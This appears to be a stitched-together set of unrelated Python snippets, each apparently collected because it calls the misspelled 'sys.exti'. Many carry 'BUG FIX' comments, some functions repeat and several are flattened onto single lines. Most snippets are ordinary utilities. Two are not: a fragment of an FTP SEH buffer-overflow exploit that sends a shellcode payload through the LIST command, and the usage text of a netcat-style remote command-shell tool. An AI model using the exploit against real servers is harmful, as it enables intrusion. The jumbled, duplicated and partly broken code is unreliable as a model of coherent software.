def collect(self):
    """Collect platform information and format it into a report.

    Dispatches to the method named after the running OS (e.g.
    ``platform.system() == 'Linux'`` -> ``self.linux()``), then passes the
    raw info through ``self.build_report_data``.

    Returns:
        The formatted report data.
    """
    try:
        # Run a different collector method depending on the platform.
        func = getattr(self, platform.system().lower())
        info_data = func()
        formatted_data = self.build_report_data(info_data)
        return formatted_data
    except AttributeError:
        # No collector method for this OS.  BUG FIX: sys.exti -> sys.exit.
        sys.exit('不支持当前[%s]操作系统!' % platform.system())
def main():
    """Load the book document, extract its text and read it aloud."""
    try:
        file_in = document_t(os.path.join("src", str(BOOK[2])))
        if file_in is None:
            sys.exit(0)  # BUG FIX: sys.exti -> sys.exit
        else:
            text = get_Text(file_in)  # extracts text
            sayit(text)  # text to speech
    except Exception as err:
        # Best-effort: report and fall through rather than crash.
        print(err)
def ucitajValutu(pitanje):
    """Prompt with *pitanje* until a currency code from listaValuta is given.

    Input is upper-cased before validation; an empty input exits the
    program.  Returns the validated currency code.
    """
    while True:
        valuta = input(pitanje)
        valuta = valuta.upper()  # normalize the code to upper case
        if valuta == "":
            sys.exit()  # BUG FIX: sys.exti -> sys.exit
        if valuta in listaValuta:
            break
        else:
            print("Nazalost ", valuta, " nije u listi.")
    return valuta
def usage(): print "BHP Net Tool" print print "Usage: bhpnet.py -t target_host -p port" print "-1 --listen -listen on [host]:[port] for incoming connections" print "-e --execute=file_to_run = execute the given file upon receiving a connection" print "-c --command -initialize a command shell" print "-u --upload=destination - upn reciving connection upload a file and write to [destination]" print print print "Examples: " print "bhpnet.py -t 192.168.0.1 -p 5555 -1 -c" print "bhpnet.py -t 192.168.0.1 -p 5555 -1 -u=c:\\target.exe" print "bhpnet.py -t 192.168.0.1 -[ 5555 -1 -e=\"cat /etc/password\"" sys.exti(0)
def draw_stone(SURFACE, field):
    """Draw the stones of an 8x8 board onto SURFACE.

    BLACK cells get a filled 60x60 ellipse, WHITE cells an outlined one
    (width 5), EMPTY cells are skipped; any other cell value is treated
    as corruption and aborts the program.
    """
    for i in range(8):
        for j in range(8):
            stone = field[(i, j)]
            # Cell centre minus half the stone size (60/2 = 30).
            ypos = 37.5 + (75 * i) - 30
            xpos = 137.5 + (75 * j) - 30
            if stone == BLACK:
                pygame.draw.ellipse(SURFACE, 0x000000, ((xpos, ypos), (60, 60)))
            elif stone == WHITE:
                # NOTE(review): the outline colour is black (0x000000); if
                # white stones should be white-filled, confirm the colour.
                pygame.draw.ellipse(SURFACE, 0x000000, ((xpos, ypos), (60, 60)), 5)
            elif stone == EMPTY:
                pass
            else:
                print("error")
                sys.exit()  # BUG FIX: sys.exti -> sys.exit
def draw_stone(SURFACE, field):
    """Draw the stones of a 4x4 board onto SURFACE.

    BLACK cells get a filled 120x120 ellipse, WHITE cells an outlined one
    (width 10), EMPTY cells are skipped; any other cell value is treated
    as corruption and aborts the program.
    """
    for i in range(4):
        for j in range(4):
            stone = field[(i, j)]
            # Cell centre minus half the stone size (120/2 = 60).
            ypos = 75 + (150 * i) - 60
            xpos = 175 + (150 * j) - 60
            if stone == BLACK:
                pygame.draw.ellipse(SURFACE, 0x000000, ((xpos, ypos), (120, 120)))
            elif stone == WHITE:
                # NOTE(review): the outline colour is black (0x000000); if
                # white stones should be white-filled, confirm the colour.
                pygame.draw.ellipse(SURFACE, 0x000000, ((xpos, ypos), (120, 120)), 10)
            elif stone == EMPTY:
                pass
            else:
                print("error")
                sys.exit()  # BUG FIX: sys.exti -> sys.exit
def main():
    """Classify the traffic-light image given on the command line.

    Downloads the Keras model from S3 on first run, preprocesses the image
    to 100x200 normalized RGB, and prints the predicted light colour.
    """
    if len(sys.argv) < 2:
        print("Usage need picture path")
        sys.exit(1)  # BUG FIX: sys.exti -> sys.exit
    PWD = os.path.abspath(os.path.dirname(__file__))
    model_path = PWD + '/model.h5'
    model_link = 'https://s3-us-west-1.amazonaws.com/carndmodel/model.h5'
    if not os.path.exists(model_path):
        print('Need download the models from AWS')
        urllib.urlretrieve(model_link, model_path)
    else:
        print('models from AWS existed, good to go')
    path = sys.argv[1]
    start = time.time()
    # BUG FIX: load from the absolute model_path instead of the CWD-relative
    # 'model.h5', which broke when the script ran from another directory.
    model = load_model(model_path)
    end = time.time()
    print('Load model time', end - start)
    model.summary()
    #test1_img = cv2.imread('trafficlight_images/1_image306_resize.jpg')
    test1_img = cv2.imread(path)
    test1_img = cv2.resize(test1_img, (100, 200), interpolation=cv2.INTER_CUBIC)
    test1_img = np.asarray(test1_img) / 255  # scale pixels to [0, 1]
    test = np.array([test1_img, ])
    start = time.time()
    test_pred = model.predict(test)
    end = time.time()
    print('Predict time', end - start)
    test_pred = np.round(test_pred)  # one-hot: [red, yellow, green]
    print(test_pred)
    if test_pred[0][0] == 1.0:
        print(path, 'is Red Light')
    elif test_pred[0][1] == 1.0:
        print(path, 'is Yellow Light')
    elif test_pred[0][2] == 1.0:
        print(path, 'is Green Light')
    else:
        print(path, 'is unknown???')
def main():
    """Copy kernel uapi headers into the OHOS sysroot and rewrite keywords.

    Returns 1 on success; exits with status 1 on any copy/chdir failure.
    """
    if len(sys.argv) > 1:
        usage()
        return -1
    kernel_dir = "prebuilts/lite/sysroot/ohos_tmp"
    external_dir = '/prebuilts/lite/sysroot/ohos_tmp_ori/uapi'
    status = -1
    try:
        build_top = os.environ["Z_BUILD_TOP"]
    except KeyError as e:
        print("[Warning] no env : %s, use current work dir." % (str(e)))
        build_top = subprocess.check_output("pwd", shell=True)
    status = copy_kernel_headers(build_top.strip(), external_dir, kernel_dir)
    if status != 1:
        print("[Error] copy files fail!!!")
        sys.exit(1)  # BUG FIX: sys.exti -> sys.exit
    try:
        os.chdir(kernel_dir + "/uapi")
    except OSError:  # narrowed from bare except: chdir raises OSError
        print("[Error] no uapi dir1!!!")
        sys.exit(1)
    # Sanity-check that we really are inside the uapi tree before rewriting.
    current_dir = os.getcwd()
    if "uapi" not in current_dir:
        print("[Error] not uapi dir!!!")
        sys.exit(1)
    for val in key_list:
        replace_key_words_ext(val)
    try:
        os.chdir("../")
    except OSError:  # narrowed from bare except
        print("[Error] no uapi dir2!!!")
        sys.exit(1)
    deal_dir("uapi")
    return 1
def parseCommandLine():
    """Parse command-line options.

    Prints usage and exits with status 2 on a bad option; exits cleanly
    on -h/--help.  Returns (output, verbose).
    """
    try:
        opts, args = getopt.getopt(sys.argv[1:], shortopts, longopts)
    except getopt.GetoptError as err:
        # print help info and exit
        print(err)
        useage()
        sys.exit(2)  # BUG FIX: sys.exti -> sys.exit
    output = None
    verbose = False
    for o, a in opts:
        if o == "-v":
            verbose = True
        elif o in ("-h", "--help"):
            useage()
            sys.exit()
        elif o in ("-o", "--output"):
            output = a
        else:
            assert False, "unhandled option"
    # BUG FIX: the parsed values were silently discarded; return them
    # (callers using the function only for its side effects are unaffected).
    return output, verbose
def Check_Installed(): if not Check(): print Fore.RED + "Directory structure not present. Attempting to create..." + Style.RESET_ALL try: Create() except: print Fore.RED + "Unable to create directory structure!" print Fore.RED + "Please check you have appropriate permissions to write to ~/" print Fore.RED + "Inception will now exit..." + Style.RESET_ALL sys.exit() print "[*] Directory structure created." if not Check_DB_Exists(): print Fore.RED + "Database not initialised. Attempting to create..." + Style.RESET_ALL try: Create_Schema() except: print Fore.RED + "Error initialising database." print Fore.RED + "Inception will now exit..." + Style.RESET_ALL sys.exti() print "[*] Database initialised." print "[*] Initial setup complete!"
def check_ovs_version(min_required_version, root_helper):
    """Verify installed OVS userspace/kernel versions support VXLAN.

    Exits with status 1 when the userspace version is too old or cannot be
    determined; a too-old or unknown kernel module only logs (error/warning).
    """
    LOG.debug(_("Checking OVS version for VXLAN support"))
    installed_klm_version = ovs_lib.get_installed_ovs_klm_version()
    installed_usr_version = ovs_lib.get_installed_ovs_usr_version(root_helper)
    # First check the userspace version
    if installed_usr_version:
        if dist_version.StrictVersion(
                installed_usr_version) < dist_version.StrictVersion(
                min_required_version):
            LOG.error(
                _('Failed userspace version check for Open '
                  'vSwitch with VXLAN support. To use '
                  'VXLAN tunnels with OVS, please ensure '
                  'the OVS version is %s '
                  'or newer!'), min_required_version)
            sys.exit(1)
        # Now check the kernel version
        if installed_klm_version:
            if dist_version.StrictVersion(
                    installed_klm_version) < dist_version.StrictVersion(
                    min_required_version):
                LOG.error(
                    _('Failed kernel version check for Open '
                      'vSwitch with VXLAN support. To use '
                      'VXLAN tunnels with OVS, please ensure '
                      'the OVS version is %s or newer!'),
                    min_required_version)
                sys.exit(1)  # BUG FIX: sys.exti -> sys.exit
        else:
            LOG.warning(
                _('Cannot determine kernel Open vSwitch version, '
                  'please ensure your Open vSwitch kernel module '
                  'is at least version %s to support VXLAN '
                  'tunnels.'), min_required_version)
    else:
        LOG.warning(
            _('Unable to determine Open vSwitch version. Please '
              'ensure that its version is %s or newer to use VXLAN '
              'tunnels with OVS.'), min_required_version)
        sys.exit(1)
def check_ovs_version(min_required_version, root_helper):
    """Verify installed OVS userspace/kernel versions support VXLAN.

    Exits with status 1 when the userspace version is too old or cannot be
    determined; a too-old or unknown kernel module only logs (error/warning).
    """
    LOG.debug(_("Checking OVS version for VXLAN support"))
    installed_klm_version = ovs_lib.get_installed_ovs_klm_version()
    installed_usr_version = ovs_lib.get_installed_ovs_usr_version(root_helper)
    # First check the userspace version
    if installed_usr_version:
        if dist_version.StrictVersion(
                installed_usr_version) < dist_version.StrictVersion(
                min_required_version):
            LOG.error(_('Failed userspace version check for Open '
                        'vSwitch with VXLAN support. To use '
                        'VXLAN tunnels with OVS, please ensure '
                        'the OVS version is %s '
                        'or newer!'), min_required_version)
            sys.exit(1)
        # Now check the kernel version
        if installed_klm_version:
            if dist_version.StrictVersion(
                    installed_klm_version) < dist_version.StrictVersion(
                    min_required_version):
                LOG.error(_('Failed kernel version check for Open '
                            'vSwitch with VXLAN support. To use '
                            'VXLAN tunnels with OVS, please ensure '
                            'the OVS version is %s or newer!'),
                          min_required_version)
                sys.exit(1)  # BUG FIX: sys.exti -> sys.exit
        else:
            LOG.warning(_('Cannot determine kernel Open vSwitch version, '
                          'please ensure your Open vSwitch kernel module '
                          'is at least version %s to support VXLAN '
                          'tunnels.'), min_required_version)
    else:
        LOG.warning(_('Unable to determine Open vSwitch version. Please '
                      'ensure that its version is %s or newer to use VXLAN '
                      'tunnels with OVS.'), min_required_version)
        sys.exit(1)
manga_dir = CONFIG.manga_directory / old_title if not manga_dir.is_dir(): return False if (manga_dir.parent / new_title).exists(): confirm = utils.ask_confirmation( "Do you want to rename the exisitng files?\n" "Existing file/directory found, this action will overwrite it. " "Are you sure you want to continue?") pass else: confirm = utils.ask_confirmation("Do you want to rename the exisitng files?") if not confirm: return False for chapter_dir in manga_dir.iterdir(): if chapter_dir.is_dir(): for page in chapter_dir.iterdir(): new_file_name = page.name.replace(old_title, new_title, 1) page.rename(page.parent / new_file_name) else: new_file_name = chapter_dir.name.replace(old_title, new_title, 1) chapter_dir.rename(chapter_dir.parent / new_file_name) manga_dir.rename(manga_dir.parent / new_title) print("Files have been renamed") return True if __name__ == '__main__': sys.exti(main())
logger.debug('logger initialized') # CSV configuration csvfile = set_filename(filename) dirname = set_dir(directory) csv_header = create_csv_header() c = None try: logger.debug('Setting up CSV file %s/%s.csv' % (dirname, csvfile)) c = csv.writer(open(dirname+"/"+csvfile+".csv", "wb"), quoting=csv.QUOTE_ALL) c.writerow(csv_header) logger.info('Successfully created CSV file %s/%s.csv' % (dirname, csvfile)) except IOException as inst: logger.error(inst) logger.error('Due to previous errors, program will exit') sys.exti() # Asking Users password for server if password is None: logger.debug('No command line password received, requesting password from user') password = getpass.getpass(prompt='Enter password for vCenter %s for user %s: ' % (servervctr,username)) # Connecting to server logger.info('Connecting to server %s with username %s' % (servervctr,username)) server = VIServer() try: logger.debug('Trying to connect with provided credentials') server.connect(servervctr,username,password) logger.info('Connected to server %s' % servervctr) logger.debug('Server type: %s' % server.get_server_type())
def main():
    """Run multiple routines to log system info.

    * Run the ps routine to get information about active processes
      (and log it to the database),
    * Run the symon001 stored procedure to get various record counts
      (and log it to the database),
    * Run vmstat and save memory and CPU info,
    * Collect and log information of files that have been accessed,
    * Collect and log nstat data for network IO.
    """
    global CONFIG_FNAME
    global MAIN_CONFIG
    global DBNAME
    global HOSTNAME
    global DB_UNAME
    global DB_PW
    global CONN_STR
    global MON_FILE_LIST

    out = {}
    MAIN_CONFIG = configparser.ConfigParser()
    MAIN_CONFIG.read(CONFIG_FNAME)
    DBNAME = MAIN_CONFIG['global']['DBNAME']
    HOSTNAME = MAIN_CONFIG['global']['HOSTNAME']
    DB_UNAME = MAIN_CONFIG['global']['DB_UNAME']
    DB_PW = MAIN_CONFIG['global']['DB_PW']
    # NOTE(review): the credentials part of this string was scrubbed in the
    # original source ("user="******"..."); reconstructed as the obvious
    # libpq-style connection string -- confirm against the deployed config.
    CONN_STR = ("host=" + HOSTNAME + " dbname=" + DBNAME
                + " user=" + DB_UNAME + " password='" + DB_PW + "'")
    if 'MON_FILE_LIST' in MAIN_CONFIG['global']:
        tmp_list = MAIN_CONFIG['global']['MON_FILE_LIST']
        MON_FILE_LIST = tmp_list.split(',')
    else:
        MON_FILE_LIST = []

    if DBNAME == '' or DB_UNAME == '' or DB_PW == '' or HOSTNAME == '':
        print('Error, database connection details are missing.')
        sys.exit(15)  # BUG FIX: sys.exti -> sys.exit

    # -------------------------------------------------------------------------
    conn, msg_d = shardfuncs.shard_connect(CONN_STR)
    if conn is None:
        print(shardfuncs.safe_string(msg_d))
        raise RuntimeError(
            shardfuncs.err_log(110015, 'Failed to ' +
                               'make a database connection in ' +
                               'nm_db_table_names', extra_msg=msg_d))
    cur = conn.cursor()

    # -------------------------------------------------------------------------
    # ps: active processes
    ps_write_count = 0
    rc, msg_d = ps()
    rslts = None  # BUG FIX: avoid NameError below when the key is missing
    try:
        # Get the dictionary object from the file monitor:
        rslts = msg_d['ps']
    except Exception:
        print('I did not find a nonexistant key')
    if rslts is not None:
        for k, v in rslts.items():
            # The 'k' values here are numeric values for the pid, e.g.
            # k=1046 v={'ppid': '1', 'uid': '0', 'time': '00:00:26',
            #           'cmd': 'SCREEN', 'parms': ''}
            cmd = 'INSERT INTO shardsvr.sysmon_ps(' + \
                ' ppid, uid, time, cmd, parms, sysmon_ps_dt) VALUES(' + \
                str(v['ppid']) + ', ' + \
                str(v['uid']) + ', ' + '0' + ', ' + \
                "'" + str(v['cmd']) + "', '" + str(v['parms']) + "', " + \
                datestamp_sql + ');'
            rc, msg = shardfuncs.shard_sql_insert(cur, cmd)
            if rc != 0:
                out.update({'Error': 'SQL insert command failed.'})
                out.update({'Error-detail': msg['Error']})
                conn.close()
                print('ERROR77777: ' + repr(msg))
            else:
                ps_write_count += 1
        # the sql-write loop is done, now commit
        cur.execute('commit;')
        # do not conn.close() until the end (or on error)
        out.update({'status': "OK"})
    print('ps write count: ' + str(ps_write_count))

    # -------------------------------------------------------------------------
    # sysmon001: stored procedure to get table counts
    rec_counts_write_count = 0
    # Run the sysmon001 stored procedure to capture a bunch of record
    # counts and save them to shardsvr.sysmon_rec_counts:
    cmd = 'SELECT shardsvr.sysmon001();'
    rc, my_data, msg = shardfuncs.shard_sql_select(cur, cmd)
    if rc != 0:
        out.update({'Error': 'SQL insert command failed.'})
        out.update({'Error-detail': msg['Error']})
        conn.close()
        print('ERROR111111: ' + repr(msg))
    else:
        rec_counts_write_count += 1
    print('rec_counts_write_count = ' + str(rec_counts_write_count))

    # -------------------------------------------------------------------------
    # vmstat - collect memory and CPU info
    rc, msg_d = vmstat()
    out.update(msg_d)
    rslts = None
    vmstat_write_count = 0
    try:
        # Get the dictionary object from the file monitor:
        rslts = msg_d['vmstat']
    except Exception:
        print('Error. I did not find vmstat output.')
    if rslts is not None:
        v = rslts
        # Note: two table fields have '-' replaced with '_':
        # non-nice_user_cpu_ticks and IO-wait_cpu_ticks
        cmd = 'INSERT INTO shardsvr.sysmon_vmstat (' \
            + 'K_total_memory, K_used_memory, K_active_memory, ' \
            + 'K_free_memory, K_swap_cache, ' \
            + 'K_total_swap, K_free_swap, ' \
            + 'non_nice_user_cpu_ticks, nice_user_cpu_ticks, ' \
            + 'system_cpu_ticks, idle_cpu_ticks, IO_wait_cpu_ticks, ' \
            + 'boot_time, sysmon_vmstat_dt) ' \
            + 'VALUES (' + str(v['K_total_memory']) + ', ' \
            + str(v['K_used_memory']) + ', ' \
            + str(v['K_active_memory']) + ', ' \
            + str(v['K_free_memory']) + ', ' \
            + str(v['K_swap_cache']) + ', ' \
            + str(v['K_total_swap']) + ', ' \
            + str(v['K_free_swap']) + ', ' \
            + str(v['non-nice_user_cpu_ticks']) + ', ' \
            + str(v['nice_user_cpu_ticks']) + ', ' \
            + str(v['system_cpu_ticks']) + ', ' \
            + str(v['idle_cpu_ticks']) + ', ' \
            + str(v['IO-wait_cpu_ticks']) + ', ' \
            + str(v['boot_time']) + ', ' + datestamp_sql + ');'
        rc, msg = shardfuncs.shard_sql_insert(cur, cmd)
        if rc != 0:
            out.update({'Error': 'SQL insert command failed.'})
            out.update({'Error-detail': msg['Error']})
            conn.close()
            print('ERROR999999: ' + repr(msg))
        else:
            vmstat_write_count += 1
        # the sql-write loop is done, now commit
        cur.execute('commit;')
        # do not conn.close() until the end (or on error)
        out.update({'status': "OK"})
    print('vmstat write count: ' + str(vmstat_write_count))

    # -------------------------------------------------------------------------
    # File Monitor (collect file attributes for specific files)
    if len(MON_FILE_LIST) > 0:
        for fname in MON_FILE_LIST:
            rc, msg_d = mon_file(fname)
            out.update(msg_d)
            rslts = None
            try:
                # Get the dictionary object from the file monitor:
                rslts = msg_d['mon_file']
            except Exception:
                print('I did not find results from the file_monitor.')
            file_write_count = 0
            if rslts is not None:
                for k, v in rslts.items():
                    # There could be many files here
                    fname = re.sub(r'[\'"\r\t\n]', '', k[0:200])
                    # These are file attributes:
                    # file_type, inode, change_time, access_time, mod_time.
                    cmd = 'INSERT INTO shardsvr.sysmon_file(' \
                        'file_name, file_type, ' \
                        'inode, chg_time, access_time, ' \
                        'mod_time, sysmon_file_dt ) ' \
                        'VALUES(' + "'" + fname + "', " \
                        + str(v['file_type']) + ', ' \
                        + str(v['inode']) + ', ' \
                        + str(v['change_time']) + ', ' \
                        + str(v['access_time']) + ', ' \
                        + str(v['mod_time']) + ', ' \
                        + datestamp_sql + ');'
                    rc, msg = shardfuncs.shard_sql_insert(cur, cmd)
                    if rc != 0:
                        out.update({'Error': 'SQL insert command failed.'})
                        out.update({'Error-detail': msg['Error']})
                        conn.close()
                        print('ERROR33333: ' + repr(msg))
                    else:
                        file_write_count += 1
                # the sql-write loop is done, now commit
                cur.execute('commit;')
                # do not conn.close() until the end (or on error)
                out.update({'status': "OK"})
                print('file write count: ' + str(file_write_count))

    # -------------------------------------------------------------------------
    # nstat - Network IO stats
    rc, msg_d = nstat()
    out.update(msg_d)
    rslts = None  # BUG FIX: avoid NameError when the key is missing
    try:
        # Get the dictionary object from the file monitor:
        rslts = msg_d['nstat']
    except Exception:
        print('I did not find the nstat dictionary key.')
    if rslts is not None:
        v = rslts
        nstat_write_count = 0
        cmd = 'INSERT INTO shardsvr.sysmon_nstat(' + \
            'IpExtInOctets, IpExtOutOctets, ' + \
            'IpInReceives, TcpActiveOpens, TcpPassiveOpens, ' + \
            'IpOutRequests, sysmon_nstat_dt) ' + \
            'VALUES( ' \
            + str(v['IpExtInOctets']) + ', ' \
            + str(v['IpExtOutOctets']) + ', ' \
            + str(v['IpInReceives']) + ', ' + str(v['TcpActiveOpens']) + ', ' \
            + str(v['TcpPassiveOpens']) + ', ' \
            + str(v['IpOutRequests']) + ', ' \
            + datestamp_sql + ');'
        rc, msg = shardfuncs.shard_sql_insert(cur, cmd)
        if rc != 0:
            out.update({'Error': 'SQL insert command failed.'})
            out.update({'Error-detail': msg['Error']})
            conn.close()
            print('ERROR8888: ' + repr(msg))
        else:
            nstat_write_count += 1
        # the sql-write loop is done, now commit
        cur.execute('commit;')
        # do not conn.close() until the end (or on error)
        out.update({'status': "OK"})
        print('nstat write count: ' + str(nstat_write_count))
if M[i][j] == -1: s_length = s_length + 1 L1.append(s_length) s_length = 0 if M[i][0] == -1: L1.pop(0) L[i] = L1 L1 = [] return L try: TunnelFile = input("Enter Tunnel File Name: ").strip() except FileNotFoundError: print("File doesn't exist. Enter valid filename.") sys.exti() try: with open(TunnelFile) as tFile: No_of_Lines = 0 InputList = [] for line in tFile: line1 = line.rstrip() if len(line1) != 0: No_of_Lines = No_of_Lines + 1 InputList.append(line1) #print(InputList) if (No_of_Lines != 2): print("The file has more than two lines of data.") raise ValueError UpArray = []
nseh = "\xeb\x06\x90\x90"# jmp short 6 bytes payload = '\x41' * 453 + nseh + seh + '\x90' * 16 + shellcode s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Connect to %s on port %d " % (target,21) try: s.connect((target,21)) s.recv(1024) s.send('USER jeff\r\n') s.recv(1024) s.send('PASS 123qwe\r\n') s.recv(1024) s.send("LIST" + payload + "\r\n" ) print "[+] Sending payload of size " + str(len(payload)) + " Bytes" s.close() print "[+] Exploit Sent Sucessfully" except: print "[-] Could not connect to " + target + ":21\r" sys.exti(0)
#pprint.pprint ( V ); def main(): # parse command line options try: opts, args = getopt.getopt(sys.argv[1:], "h", ["help"]) except getopt.error, msg: print msg print "for help use --help" sys.exit(2) # process options for o, a in opts: if o in ("-h", "--help"): print __doc__ sys.exit(0) # process arguments if (len(args) == 1): process(args[0]) # process() is defined elsewhere elif (len(args) == 2): process(args[0], extra=args[1]) else: print "pass with one or two args" sys.exti(4) from RTN_byname_target import * if __name__ == "__main__": main()
def ReRange(path):
    """Re-arrange land-contract survey documents under each village directory.

    For every sub-directory of *path* whose name ends with '村' (village):
    seed a per-person 'temp' result tree from the plot-survey directory,
    copy each person's related documents (contractor survey, publication
    roster, representative declaration, contract) into it, then prefix the
    files and folders with the code parsed from the 发包方调查表 file name
    and move the renamed folders back into the village directory.
    """
    RootPath = path
    allCountries = os.listdir(RootPath)
    for x in allCountries:
        # NOTE(review): os.path.isdir(x) resolves against the CWD, not
        # RootPath -- confirm callers chdir() into *path* first.
        if os.path.isdir(x) and x.endswith('村'):
            dirsInOneCountry = os.listdir(x)
            resPath = os.path.join(RootPath, x, 'temp\\')
            bResPath = False
            if os.path.exists(resPath):
                if os.listdir(resPath):
                    bResPath = True
                else:
                    shutil.rmtree(resPath)
            for y in dirsInOneCountry:
                if not bResPath and '承包地块调查表' in y:
                    # Seed the result tree from the plot-survey directory.
                    shutil.copytree(os.path.join(RootPath, x, y), resPath)
                    break
            persons = os.listdir(resPath)
            subCountryPath = os.path.join(RootPath, x)
            FBFDM = ""  # BUG FIX: ensure defined even when no 发包方调查表 dir exists
            for y in dirsInOneCountry:
                subCountryPath = os.path.join(RootPath, x, y)
                if '承包方调查表' in y:
                    CBFDCBs = os.listdir(subCountryPath)
                    for z in CBFDCBs:
                        name = z.split('-')[1]
                        if name in persons:
                            shutil.copy(os.path.join(subCountryPath, z),
                                        os.path.join(resPath, name, z))
                if '公示结果归户表' in y:
                    GHBs = os.listdir(subCountryPath)
                    for z in GHBs:
                        name = z.split('-')[0]
                        if name in persons:
                            shutil.copy(os.path.join(subCountryPath, z),
                                        os.path.join(resPath, name, z))
                if '农户代表声明书' in y:
                    SMSs = os.listdir(subCountryPath)
                    for z in SMSs:
                        name = z.split('-')[1]
                        if name in persons:
                            shutil.copy(os.path.join(subCountryPath, z),
                                        os.path.join(resPath, name, z))
                if '承包合同' in y:
                    HTs = os.listdir(subCountryPath)
                    for z in HTs:
                        name = z.split('-')[1]
                        if name in persons:
                            shutil.copy(os.path.join(subCountryPath, z),
                                        os.path.join(resPath, name, z))
                if '发包方调查表' in y:
                    FBFDCBs = os.listdir(subCountryPath)
                    if len(FBFDCBs) == 1:
                        # The code is the text between '(' and ')' in the name.
                        FBFDM1 = FBFDCBs[0].split('(')[1]
                        FBFDM = FBFDM1.split(')')[0]
                    else:
                        print("发包方调查表中有多个文件,请检查")
                        quit('请按任意键退出...')
                        # BUG FIX: sys.exti -> sys.exit (unreachable after
                        # quit(), kept for safety).
                        sys.exit(1)
            # rename
            if FBFDM != "":
                for y in dirsInOneCountry:
                    if '承包方调查表' in y:
                        CBFDCBs = os.listdir(os.path.join(RootPath, x, y))
                        for z in CBFDCBs:
                            CBF_CODE = z.split('-')[0]
                            CBF_NAME = z.split('-')[1]
                            CBF_CODE_NAME = CBF_CODE + '_' + CBF_NAME
                            name = z.split('-')[1]
                            if name in persons:
                                personFiles = os.listdir(
                                    os.path.join(resPath, name))
                                for w in personFiles:
                                    if '归户表' in w and not os.path.exists(
                                            os.path.join(
                                                resPath, name,
                                                FBFDM + CBF_CODE + '-' + w)):
                                        os.rename(
                                            os.path.join(resPath, name, w),
                                            os.path.join(
                                                resPath, name,
                                                FBFDM + CBF_CODE + '-' + w))
                                    if '归户表' not in w and not os.path.exists(
                                            os.path.join(
                                                resPath, name, FBFDM + w)):
                                        os.rename(
                                            os.path.join(resPath, name, w),
                                            os.path.join(
                                                resPath, name, FBFDM + w))
                                os.rename(
                                    os.path.join(resPath, name),
                                    os.path.join(resPath,
                                                 FBFDM + CBF_CODE_NAME))
                                if not os.path.exists(
                                        os.path.join(RootPath, x,
                                                     FBFDM + CBF_CODE_NAME)):
                                    shutil.move(
                                        os.path.join(resPath,
                                                     FBFDM + CBF_CODE_NAME),
                                        os.path.join(RootPath, x))
            # Remove the per-village temp tree when done.
            shutil.rmtree(resPath)
CONFIG_FNAME = '/var/natmsg/conf/housekeeping_shardsvr.conf'

# Load the database connection details from the config file.
MAIN_CONFIG = configparser.ConfigParser()
MAIN_CONFIG.read(CONFIG_FNAME)
DBNAME = MAIN_CONFIG['global']['DBNAME']
HOSTNAME = MAIN_CONFIG['global']['HOSTNAME']
DB_UNAME = MAIN_CONFIG['global']['DB_UNAME']
DB_PW = MAIN_CONFIG['global']['DB_PW']
if DBNAME == '' or DB_UNAME == '' or DB_PW == '' or HOSTNAME == '':
    print('Error, database connection details are missing.')
    sys.exit(15)  # BUG FIX: sys.exti -> sys.exit

##############################################################################
# Build a PostgreSQL timestamp literal for this run.
datestamp = datetime.datetime.now()
datestamp_sql = "'" + str(datestamp.year) + "-" \
    + str(datestamp.month).zfill(2) \
    + "-" + str(datestamp.day).zfill(2) + ' ' \
    + str(datestamp.hour).zfill(2) \
    + ':' + str(datestamp.minute).zfill(2) + ':' \
    + str(datestamp.second).zfill(2) + "'::timestamp "
## print('datestamp: ' + datestamp_sql)

############################################################
# register the ssl keys and a few shards that
# I create that should never be read
out = {}
def main():
    """Run multiple routines to log system info.

    * Run the ps routine to get information about active processes
      (and log it to the database),
    * Run the symon001 stored procedure to get various record counts
      (and log it to the database),
    * Run vmstat and save memory and CPU info,
    * Collect and log information of files that have been accessed,
    * Collect and log nstat data for network IO.
    """
    global CONFIG_FNAME
    global MAIN_CONFIG
    global DBNAME
    global HOSTNAME
    global DB_UNAME
    global DB_PW
    global CONN_STR
    global MON_FILE_LIST

    out = {}
    MAIN_CONFIG = configparser.ConfigParser()
    MAIN_CONFIG.read(CONFIG_FNAME)
    DBNAME = MAIN_CONFIG['global']['DBNAME']
    HOSTNAME = MAIN_CONFIG['global']['HOSTNAME']
    DB_UNAME = MAIN_CONFIG['global']['DB_UNAME']
    DB_PW = MAIN_CONFIG['global']['DB_PW']
    # NOTE(review): the credentials part of this string was scrubbed in the
    # original source ("user="******"..."); reconstructed as the obvious
    # libpq-style connection string -- confirm against the deployed config.
    CONN_STR = ("host=" + HOSTNAME + " dbname=" + DBNAME
                + " user=" + DB_UNAME + " password='" + DB_PW + "'")
    if 'MON_FILE_LIST' in MAIN_CONFIG['global']:
        tmp_list = MAIN_CONFIG['global']['MON_FILE_LIST']
        MON_FILE_LIST = tmp_list.split(',')
    else:
        MON_FILE_LIST = []

    if DBNAME == '' or DB_UNAME == '' or DB_PW == '' or HOSTNAME == '':
        print('Error, database connection details are missing.')
        sys.exit(15)  # BUG FIX: sys.exti -> sys.exit

    # -------------------------------------------------------------------------
    conn, msg_d = shardfuncs.shard_connect(CONN_STR)
    if conn is None:
        print(shardfuncs.safe_string(msg_d))
        raise RuntimeError(shardfuncs.err_log(110015, 'Failed to ' +
                                              'make a database connection in ' +
                                              'nm_db_table_names',
                                              extra_msg=msg_d))
    cur = conn.cursor()

    # -------------------------------------------------------------------------
    # ps: active processes
    ps_write_count = 0
    rc, msg_d = ps()
    rslts = None  # BUG FIX: avoid NameError below when the key is missing
    try:
        # Get the dictionary object from the file monitor:
        rslts = msg_d['ps']
    except Exception:
        print('I did not find a nonexistant key')
    if rslts is not None:
        for k, v in rslts.items():
            # The 'k' values here are numeric values for the pid, e.g.
            # k=1046 v={'ppid': '1', 'uid': '0', 'time': '00:00:26',
            #           'cmd': 'SCREEN', 'parms': ''}
            cmd = 'INSERT INTO shardsvr.sysmon_ps(' + \
                ' ppid, uid, time, cmd, parms, sysmon_ps_dt) VALUES(' + \
                str(v['ppid']) + ', ' + \
                str(v['uid']) + ', ' + '0' + ', ' + \
                "'" + str(v['cmd']) + "', '" + str(v['parms']) + "', " + \
                datestamp_sql + ');'
            rc, msg = shardfuncs.shard_sql_insert(cur, cmd)
            if rc != 0:
                out.update({'Error': 'SQL insert command failed.'})
                out.update({'Error-detail': msg['Error']})
                conn.close()
                print('ERROR77777: ' + repr(msg))
            else:
                ps_write_count += 1
        # the sql-write loop is done, now commit
        cur.execute('commit;')
        # do not conn.close() until the end (or on error)
        out.update({'status': "OK"})
    print('ps write count: ' + str(ps_write_count))

    # -------------------------------------------------------------------------
    # sysmon001: stored procedure to get table counts
    rec_counts_write_count = 0
